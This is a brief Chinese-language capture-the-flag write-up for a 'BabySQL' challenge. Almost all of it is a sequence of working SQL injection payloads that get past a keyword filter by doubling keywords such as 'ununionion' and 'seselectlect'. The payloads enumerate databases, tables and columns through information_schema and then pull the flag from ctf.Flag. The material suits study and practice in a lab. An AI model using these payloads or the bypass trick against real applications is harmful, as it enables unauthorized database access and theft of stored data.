BabySQL
尝试联合注入
1' union select 1#
发现只报错了1,推测被过滤,双写绕过
1' ununionion seselectlect 1 #
尝试到3后成功注入,有回显
1' ununionion seselectlect 1,2,3#
爆库
1' ununionion seselectlect 1,2,(selselectect database())#
爆所有库
这里我常用的语句
1' ununionion seselectlect 1,2,group_concat(distinct TABLE_SCHEMA) FRfromOM infoorrmation_schema.tables#
查了一下,wp用另一个表
1' ununionion seselectlect 1,2,group_concat(distinct SCHEMA_NAME)FRromOM
infoorrmation_schema.schemata#
这两个表都可以
查询表
1' ununionion seleselectct 1,2,group_concat(distinct TABLE_NAME) FRfromOM infoorrmation_schema.tables WHWHEREERE table_schema='ctf'#
查字段
1' ununionion seselectlect 1,2,
group_concat(COLUMN_NAME) frfromom infoorrmation_schema.columns whwhereere
table_name='Flag'#
查字段内容
1' ununionion seselectlect 1,2,
group_concat(flag) frfromom ctf.Flag#
Last modified 8mo ago